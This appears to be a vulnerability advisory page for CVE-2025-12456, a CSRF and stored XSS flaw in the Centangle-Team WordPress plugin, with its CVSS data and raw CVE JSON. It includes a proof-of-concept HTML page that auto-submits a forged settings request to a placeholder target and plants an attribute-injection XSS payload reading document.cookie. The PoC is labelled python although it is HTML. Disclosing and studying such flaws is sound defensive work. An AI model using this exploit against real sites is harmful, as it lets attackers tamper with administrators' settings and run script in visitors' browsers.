Security Vulnerability Report
中文
CVE-2025-12456 CVSS 6.1 MEDIUM

CVE-2025-12456

Published: 2025-11-04 05:16:17
Last Modified: 2026-04-15 00:35:42

Description

The Centangle-Team plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to modify plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Additionally, due to insufficient input sanitization and output escaping on cai_name_color parameter, this issue allows to inject arbitrary web scripts in pages, that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Centangle-Team WordPress Plugin <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-12456 CSRF + Stored XSS PoC --> <!-- This PoC exploits the CSRF vulnerability to inject malicious XSS payload --> <html> <body> <h2>CVE-2025-12456 CSRF + Stored XSS Exploit</h2> <p>诱骗管理员点击此链接以触发漏洞利用</p> <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="exploitForm"> <input type="hidden" name="action" value="cai_save_settings" /> <input type="hidden" name="cai_name_color" value='" onmouseover=alert(document.cookie) x="' /> <input type="hidden" name="submit" value="Save Settings" /> </form> <script> // Auto-submit form to exploit CSRF document.getElementById('exploitForm').submit(); </script> <p>XSS Payload: " onmouseover=alert(document.cookie) x="</p> <p>This payload will be stored and executed when users visit affected pages.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12456", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:16.587", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Centangle-Team plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to modify plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Additionally, due to insufficient input sanitization and output escaping on cai_name_color parameter, this issue allows to inject arbitrary web scripts in pages, that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/centangle-team/trunk/Centangle-Team-Showcase.php#L132", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/centangle-team/trunk/inc_/cai_setting.php#L172", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/centangle-team/trunk/inc_/cai_setting.php#L196", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/centangle-team/trunk/inc_/cai_setting.php#L88", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6ff637c7-677f-4d70-b3cb-770d0a47e691?source=cve", "source": "[email protected]"}]}}